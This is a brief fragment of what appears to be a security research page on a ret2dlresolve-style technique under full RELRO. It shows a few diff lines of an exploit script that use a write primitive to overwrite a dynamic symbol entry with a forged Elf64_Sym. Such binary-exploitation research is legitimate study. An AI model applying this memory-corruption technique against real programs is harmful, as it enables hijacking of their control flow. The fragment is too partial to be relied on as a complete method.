Home/Research/ret2dso: Runtime Ret2dlresolve Under Full RELRO

 drift_write(p, target, b"\xf0")

-# Overwrite symbol entry
+# 2. Overwrite a concrete symbol entry with the forged Elf64_Sym

 target = entropy + LDBASE_WRITABLE_OFFSET + DSO_SYM_ENTRY_OFFSET